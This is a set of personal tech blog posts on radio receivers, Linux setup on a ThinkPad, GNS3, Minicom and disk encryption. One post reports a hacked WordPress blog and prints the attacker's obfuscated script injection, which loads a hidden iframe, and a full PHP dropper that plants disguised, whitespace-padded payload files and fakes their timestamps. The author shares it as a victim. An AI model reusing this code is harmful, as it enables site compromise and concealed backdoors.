I just received my RTL-SDR to play with radio frequencies.

This one is based on a RTL2832U chipset and a R820T tuner. My choice was in part influenced by this review. Note that this kind of device isa receiver, so it will not be able to transmit anything.

Keedox RTL-SDR (RTL2832U with R820T tuner)

This model has the advantage of being really small, but maybe at the costing of heating. I noticed the USB connector becomes painfully hot during long sessions. Nothing serious, but a negative point though.

Of course, it is fully compatible with Linux and Gqrx even maintain a package for Ubuntu, so getting it to work consists simply in one apt-get command.

Gqrx

I already intercepted a few conversations on the AM 430Hz range, and a lot of weird signals (many are probably car or parking doors) all over that I recorded and will look at later.

Well, it is fun! Thanks to @virtualabs for bringing it up to my interest.

I was having a daily kernel panic and weired file system corruptions, which I first tought were coming from the successive crashes and reboots.

However, while it happened again and again and I could not find any good reason for that, I became more doubtful about my hardware and finally found the culprit.
I booted on Memtest, installed with zypper from the repo, which immediately displayed a lot of errors. The tedious task of isolating the faulty memory module revealed that it was one from a Ballistix bundle that I bought just 3 months ago.

I usually use Kingston or Corsair and never had such a problem, but maybe I was just lucky. I will test now the customer service of Ballistix.

Wednesday evening, I called the support to report that I was not satified with my battery. I had lost 25% of its capacity over less than 8 months.

Thursday morning, I am recalled by someone from the technical service. They first say that the battery is no more under warranty – 1 year long. I guess they say so after checking when the battery was made or sold the retailer. That does not concern the end-consumer like me : the warranty only started when I purchased the laptop, and I still have 4 months of warranty ahead.

As they asked, I send them by fax the bill which proves that, thursday afternoon. Soon after, they recall me again, just to tell me that a new battery is going to be sent to me.

Friday morning, it arrived ! So far, so good !

Next time, I may test it again concerning this issue (not so terrible in fact, and I am reluctant to send back my laptop).

If you think you did, read it again –  and do not interpret them.

It would avoid loosing time with a boot error like :

CDR101: not ready reading drive C

That occurs when you choose the CD player as a temporary boot device (Thinkvantage button and then F3), although it is required to really change the boot order within the BIOS menu (F2) and save this setting.

By the way, I really recommend a BIOS update if you are a happy Thinkpad T61 user : not only it fixes numerous issues with the Intel chipset, but it optimizes power management. I noticed that the fan management has been improved. It is most of time slower than before, so the laptop is more silent.

I sometimes use Boson Netsim, which is not only non-free but not so reliable.

However, as I just started to use GNS3 and Dynamips, I don’t know it so well yet and won’t compare any further the two solutions.

On this page, I am just summarizing the few steps to set it up on your Linux system.

First, set up the prerequisite :

$ aptitude install python-qt4

Now, go to gns3.net and download the source code for Linux (direct link).

You may extract the archive in your local application folder :

$ wget http://pfe.epitech.net/frs/download.php/819/GNS3-0.5-src.tar.gz
$ tar -xzvf GNS3-0.5-src.tar.gz -C /opt

Then, you need the dynamips binary from the dynamips blog (direct links for x86 or amd64 platforms).
The file must be executable.

$ wget http://www.ipflow.utc.fr/dynamips/dynamips-0.2.8-RC2-amd64.bin
$ chmod u+x dynamips*.bin
$ mv dynamips-0.2.8-RC2-amd64.bin /opt

Now, start GNS3 :

$ /opt/GNS3-0.5-src/gns3

In the edit menu, select preferences and go the dynamips section.

Just browse to the dynamips binary you dowloaded, to fill the value of the executable path field.

Still from the edit menu, select IOS images and hypervisors. There, you have to add all the IOS images you want to use, one after another. Normally, the default settings for each file loaded are suitable.

Back to the main window, you can drag and drop routers and link them, creating the topology you wish.

For now, just add one router. Right click on it and select start to start it up. Right click again and select console.

Enjoy ! Of course, I strongly recommand that you start reading further from this page.

Resources :

http://www.ipflow.utc.fr/blog/
http://www.gns3.net/
http://www.blindhog.net/tutorials/gns3-linux-install/gns3-linux-install.html

It looks like some spammer managed to inject some PHP code into almost all *.php files of WordPress.
It was not just like the classic SQL injection that is usually used to post some malicious post.

The following code was added :

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

It make me think that there is a serious vulnerability somewhere on WordPress or a plugin, though my versions were up-to-date.

Now the blog is back to normal, after a clean reinstallation (erased all the former files).

I am not the only one to experience this mess.

For now, the blog is running with a minimal number of plugin – just akismet, actually – until the cause of that gets clearer.

Not a lot of plugins runned before, so it mainly means that the OpenID support for authentication is cut off.

As my php knowledge is very low, anyone having some tips is welcome. I love WordPress, I would like to avoid looking for another platform or switch to static html !

—

UPDATE 06/13/2008 :
As C.S Lee suggested in a comment, there were a very suspicious wp-stats.php file in the root of my hacked archive.

There is the code :

<?php

@error_reporting(E_ALL);
@set_time_limit(0);
mt_srand(crc32(microtime()));
  
  
define('SHCODE', 'PDaWYgKCRjb2RlID0gQGZyZWFkKEBmb3BlbigkSFRUCmVjaG8gIjwvcHJlPiI7Cj8+');

$pres = array('lib_','co_','pre_','net_','func_','ad_','ext_','new_','old_','fix_','fixed_','na_','av_','fx_');  
$fui = $pres[array_rand($pres)];

global $HTTP_SERVER_VARS;
$START = time();
$WD_TIMEOUT = array(8, 7, 6, 6, 5, 5, 5, 5, 0);

function my_fwrite($f, $data) {
  global $CURFILE;
  $file_mtime = @filemtime($f);
  $file_atime = @fileatime($f);
  $dir_mtime = @filemtime(@dirname($f));
  $dir_atime = @fileatime(@dirname($f));
  if ($file_h = @fopen($f, "wb")) {
    @fwrite($file_h, $data); @fclose($file_h);
    if ($file_mtime) {
      @touch($f, $file_mtime, $file_atime);
    } elseif (@filemtime($CURFILE)) {
      @chmod($f, @fileperms($CURFILE));
      @touch($f, @filemtime($CURFILE), @fileatime($CURFILE));
      @chgrp($f, @filegroup($CURFILE));
      @chown($f, @fileowner($CURFILE));
    };
    if ($dir_mtime) @touch(@dirname($f), $dir_mtime, $dir_atime);
    return $f;
  } else {
    return '';
  };
};

function ext($f) {
  return substr($f, strrpos($f, ".") + 1);
};

function walkdir($p, $func='_walkdir', $l=0) {
  global $START;
  global $WD_TIMEOUT;
  global $FL;
  $func_f = "{$func}_f";
  $func_d = "{$func}_d";
  $func_s = "{$func}_s";
  $func_e = "{$func}_e";
  if ($dh = @opendir("$p")) {
    if (function_exists($func_s)) {
      if ($func_s($p, $l)) return 1;
    };
    while ($f = @readdir($dh)) {
      if (time() - $START >= $WD_TIMEOUT[$l] ) break;
      if ($f == '.' || $f == '..' ) continue;
      if (@is_dir ("$p$f/") ) walkdir("$p$f/", $func, $l+1);
      if (@is_dir ("$p$f/") && function_exists($func_d))
        $func_d("$p$f/", $l);
      if (@is_file("$p$f" ) && function_exists($func_f))
        $func_f("$p$f" , $l);
    };
    closedir($dh);
    if (function_exists($func_e)) $func_e($p, $l);
  };
};

function r_cut($p) {
  global $R;
  return substr($p, strlen($R));
};

function say($t) {
  echo "$t\n";
};

function testdata($t) {
  say(md5("mark_$t"));
};

$R = $HTTP_SERVER_VARS['DOCUMENT_ROOT'];
$CURFILE = $HTTP_SERVER_VARS['DOCUMENT_ROOT'] .
  $HTTP_SERVER_VARS['SCRIPT_NAME'];
echo "<pre>";
testdata('start');
$fe = ext($CURFILE);
if (!$fe) $fe = 'php';
//$FN = "namogofer.$fe";

function _walkdir_s($d, $l) {
  global $FCNT;
  $FCNT = array( 'fn' => '', 'dir' => 0, 'file' => 0, 'simtype' => 0 );
};

function _walkdir_d($d,$l) {
  global $FCNT;
  $FCNT['dir' ]++;
};

function _walkdir_f($f,$l) {
  global $FCNT, $CURFILE;
  $FCNT['file']++;
  if (ext($f) == ext($CURFILE)) $FCNT['simtype']++;
};

function update_passwd($data)
  {
  global $FCNT;
  $password = "";
  $possible = "abcdefghijklmnopqrstuvxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*"; 
  $i = 0;
  while ($i < 15) 
    { 
    $char = substr($possible, mt_rand(0, strlen($possible)-1), 1);
    if (!strstr($password, $char)) 
      { 
      $password .= $char;
      $i++;
      }
    }
  $FCNT['passwd'] = $password;
  $md5password = md5($password);
  return preg_replace("|define\('PASSWD',\s*'(.*)'|", "define('PASSWD','$md5password'", $data);
  }

function notinf($ar, $tx)
  {
  $R = true;
  foreach ($ar as $ca)
    {
    //echo "pass ".substr($tx, 0, strlen($ca))." in $tx for $ca\n";
    if ("$ca" == substr($tx, 0, strlen($ca)))
      {
      $R = false;
      //echo "gotcha\n";
      break;
      }
    }
  return $R;
  }

function _walkdir_e($d,$l) 
  {
  global $C, $FCNT, $FN, $fui, $pres;
  
    $the_data = base64_decode(SHCODE);
    $the_dir = opendir("$d");
    $is_php=false;
    if ($the_dir)
        while($cfile = readdir($the_dir))
            {
            if(
                $is_php=
                
                (('.php' == substr($cfile, -4))and
                 notinf($pres, $cfile)and
                ($cfile!='index.php'))
                 
              )
              {
              $FN = "$fui$cfile";
              break;
              }
              else
              {
              //echo "pass $cfile\n";
              }
            }
                         
        if ( $is_php and my_fwrite("$d$FN", str_repeat("\n",100) . str_repeat('', 150) .
                    update_passwd($the_data . str_repeat(' ', 150) . "\n" . str_repeat("\n", 100))))
                    {
                    $FCNT['fn'] = r_cut("$d$FN");
                    say(implode(" ", $FCNT));
                    }

  };

walkdir("$R/");
testdata('end');
?>

I will try anyway to put a deeper look when I have a little time : now, I have to go to work.

Hardware encryption is provided by a few laptop makers, generally on high-range an business models.

It has much less performance impact than software encryption, and protect the data independently from your system configuration and its partitions.

Full disk encryption is the so called hardware encryption technology used by Lenovo on my Thinkpad.

Mine comes with a Hitachi hard drive. Hitachi names its encryption technology “Bulk Data Encryption”.

I know at least Seagate provides the same kind of feature.

The bulk data encryption is based on the AES algorithm with a 128 bits key.

Actually, the encryption is not done by the laptop itself but by the hard-drive.

You need both the hard drive and the laptop supporting encryption , for the following reasons :

1. your motherboard must have a TPM chip, which is used for the encryption, as a unique source to derivate the encryption keys.
2. the BIOS must interface with the hard drive FDE, to set/unset the encryption and to prompt for the password before the real boot (actually, a small OS embedded on the drive take care of this authentication).

In reality, the encryption is always active and the password to access to the drive is just another security feature. There is no link between these two functions. That’s why the fact of setting a password is immediate : no reencryption is done because the password has nothing to do with encryption.

In case of authentication success, the system boots normally.

In case of failure, and if the maximum number of attempt is reached, the data is erased. Instead of initializing the content with 0, which would take a lot of time and could be interrupted by shutting down the machine, just the keys are destroyed within a few seconds.

Anyway, the content is supposed to be very hard to retrieve thanks to the effectiveness of the AES algorithm.

One important thing is that the key is not a derivate of the password you set.

The hard drive password is a feature that does not come necessarily with encryption.

It is just there to limit the access of the content, but not its confidentiality.

For instance, you could imagine that if the drive is stolen, someone opens physically the drive, change the ROM to pass over the password and read your data without any pain.

The con of that is the encryption keys generation is based on your hardware. A different hardware can’t decipher the drive.

If your motherboard breaks down, you won’t be able to read your data from another computer ! Make some good backups…

To go back to the main topic, is the cold boot attack a threat for this hardware encryption ?

No. The encryption algorithm is not in the user land, so no key is stored in RAM.

The key hashes are stored directly on the disk.

These documents from Hitachi provide more detailed information :

Bulk encryption white paper

HowTo guide for bulk data encryption

This Wikipedia article, underlining the main points of hardware encryption,  is also interesting.

I guess that at some point it would be possible to read some hash on the hard drive electronic board, but this is not going to be easy. You need to be a hardware expert in hard drives and for sure it can’t be done as quickly as with the RAM chip.

Of course, even the cold boot attack is extreme. Most of thief won’t care about your data, or won’t be the knowledge or the practical possibility to conduct a successful attack.

If you don’t have FDE support, you should continue to use an encryption solution like dm-crypt or Truecrypt and maybe consider turning off your computer more often.

It anyway remains an excellent solution for external disks, as it is normally not all the time attached to your computer.

Personally, as FDE offers more performance and transparency, I am using it on my laptop but I keep using dm-crypt on all my external drives.

Now the question is : what good workaround can be found to provide more secure software encryption ?

About laptop PC, I have always been conveiced that the best pieces of hardware are found among Sony and Lenovo (ex-IBM). In tough or ultra-light categories, I would add Panasonic, but it is not the kind of laptop I am looking for.

So this time I am giving a try to Lenovo. What really decided me is its old fashion screen, I mean a non-bright one. My eyes are really getting tired with all these new bright laptop screens. Plus, its resolution is impressive : 1440 x 900.

So far I am pretty satisfied. For my need, the 14.1″ screen is the best compromise, and so is the weight and size of the laptop.

Without surprise, the keyboard and the trackpoint are just excellent. I also aprreciate some features like the hardware encryption of the hard drive, which also benefits from the active protection (head parking in case of shock to protect the data).

The laptop built and design are not as nice and polished as the Sony ones, but it is certainly solid.

After I took it just out of the box, I thought I would give a look to the pre-installed Windows Vista system. But the first startup appeared to be so long that I quickly stopped it in the middle of its process, inserted a fresh Debian Lenny 64 bits CD and went for a set up.

I worked pretty well out of the box. Like usual, I had to download the Intel Wifi firmware and the proprietary nvidia driver to use all the features of my Quadro NVS 140M graphic card.

More annoying, the active protection is not supported by default by the kernel.

I also have a problem with hibernation. Suspend to RAM works well, but resuming after suspend to disk always leave me on a blank screen. I guess this is related to the graphic driver, but so far the workaround that I found from other users don’t work for me.

Other things, including the fingerprint reader, work pretty well.

There are a number of guides from the ThinkWiki website that helped me a lot. Among them :

http://www.thinkwiki.org/wiki/Installing_Debian_Lenny_on_a_ThinkPad_T61

Set up the active protection (patch and recompile the kernel :( ) :

http://www.thinkwiki.org/wiki/Installing_Debian_Lenny_on_a_ThinkPad_T60#hdapsd

Get the fingerprint reader work :

https://wiki.ubuntu.com/ThinkFinger

However, after a few days, I realized that I was not satisfied by the responsiveness of the laptop, and especially the way it managed multiprocessing. I also wanted to use the active protection for my hard drive.

I decided to compile my own kernel, more optimized than the generic AMD 64 one provided by Debian.

Here is an excerpt from my .config file activating some features for a Core 2 Duo Intel processor – this apply to the latest version of Linux today, 2.6.24-2 :

#
# Processor type and features
#
CONFIG_TICK_ONESHOT=y
CONFIG_NO_HZ=y
CONFIG_HIGH_RES_TIMERS=y
CONFIG_GENERIC_CLOCKEVENTS_BUILD=y
CONFIG_SMP=y
CONFIG_X86_PC=y
CONFIG_MCORE2=y
CONFIG_X86_L1_CACHE_BYTES=64
CONFIG_X86_INTERNODE_CACHE_BYTES=64
CONFIG_X86_CMPXCHG=y
CONFIG_X86_L1_CACHE_SHIFT=6
CONFIG_X86_GOOD_APIC=y
CONFIG_X86_INTEL_USERCOPY=y
CONFIG_X86_USE_PPRO_CHECKSUM=y
CONFIG_X86_TSC=y
CONFIG_X86_MINIMUM_CPU_FAMILY=64
CONFIG_HPET_TIMER=y
CONFIG_HPET_EMULATE_RTC=y
CONFIG_GART_IOMMU=y
CONFIG_CALGARY_IOMMU=y
CONFIG_CALGARY_IOMMU_ENABLED_BY_DEFAULT=y
CONFIG_SWIOTLB=y
CONFIG_NR_CPUS=8
CONFIG_SCHED_SMT=y
CONFIG_SCHED_MC=y
CONFIG_PREEMPT_VOLUNTARY=y
CONFIG_PREEMPT_BKL=y
CONFIG_X86_LOCAL_APIC=y
CONFIG_X86_IO_APIC=y
CONFIG_X86_MCE=y
CONFIG_X86_MCE_INTEL=y
CONFIG_X86_MCE_AMD=y
CONFIG_MICROCODE=m
CONFIG_MICROCODE_OLD_INTERFACE=y
CONFIG_X86_MSR=m
CONFIG_X86_CPUID=m
CONFIG_NUMA=y
CONFIG_K8_NUMA=y
CONFIG_X86_64_ACPI_NUMA=y
CONFIG_NODES_SHIFT=6
CONFIG_ARCH_DISCONTIGMEM_ENABLE=y
CONFIG_ARCH_DISCONTIGMEM_DEFAULT=y
CONFIG_ARCH_SPARSEMEM_ENABLE=y
CONFIG_SELECT_MEMORY_MODEL=y
CONFIG_DISCONTIGMEM_MANUAL=y
CONFIG_DISCONTIGMEM=y
CONFIG_FLAT_NODE_MEM_MAP=y
CONFIG_NEED_MULTIPLE_NODES=y
CONFIG_SPARSEMEM_VMEMMAP_ENABLE=y
CONFIG_SPLIT_PTLOCK_CPUS=4
CONFIG_MIGRATION=y
CONFIG_RESOURCES_64BIT=y
CONFIG_ZONE_DMA_FLAG=1
CONFIG_BOUNCE=y
CONFIG_VIRT_TO_BUS=y
CONFIG_MTRR=y
CONFIG_SECCOMP=y
CONFIG_CC_STACKPROTECTOR=y
CONFIG_HZ_1000=y
CONFIG_HZ=1000
CONFIG_KEXEC=y
CONFIG_PHYSICAL_START=0x200000
CONFIG_PHYSICAL_ALIGN=0x200000
CONFIG_HOTPLUG_CPU=y
CONFIG_ARCH_ENABLE_MEMORY_HOTPLUG=y
CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID=y
CONFIG_OUT_OF_LINE_PFN_TO_PAGE=y

The important differences with the standard kernel are :

• the timer frequency set to “1000 Hz”,
• processor familly to “Core 2”
• preemption model to “Voluntary”

I am seeing now better performance in threading and global responsiveness – including, believe it or not, with the compiz effect, what I didn’t expect at all.

At the end, I just have hibernation not working : it is nice to see how good the support of Debian Lenny is, thought the hardware is pretty recent. Things are really improving quickly.

If you have some issue installing Linux on your Thinpad, post your problem here. I will be happy to help you as much as I can.

Nowadays many computers – and especially laptops don’t have anymore a built-in serial port. Not a problem, there are many cheap serial-usb converters like this.

As an alternative to the Hyperterminal of Microsoft, there is Minicom on Linux.

It is very easy to install and configure :

$ apt-get install minicom lrzsz

Before going further, you need to know what is the corresponding Linux device for the port where you plugged the router. As I used an usb adapter, my device was /dev/ttyUSB0. Otherwise, it will probably be one of the /dev/ttyS* devices.
Checking the dmesg output while you plug the device will give you the right device to use.

Now start minicom this way to edit the configuration :

$ minicom -s

In the menu, select Serial Port Configuration and :

• press A and update the serial port path with the one you found in dmesg
• press E and then C to change the speed to 9600
• press F to switch off the hardware flow control
• select Save the configuration as… and name it as, let’s say, “cisco”

You should be able to connect right now. Next time, just start Minicom like this :

$ minicom cisco

That’s it !

http://hardware4linux.info/

Whith the provided script, you can upload your hardware information there and quickly rate your experience with it (for each equipment it detected).

I just did it for my laptop and will go on with my other machines. It will probably become an interesting database.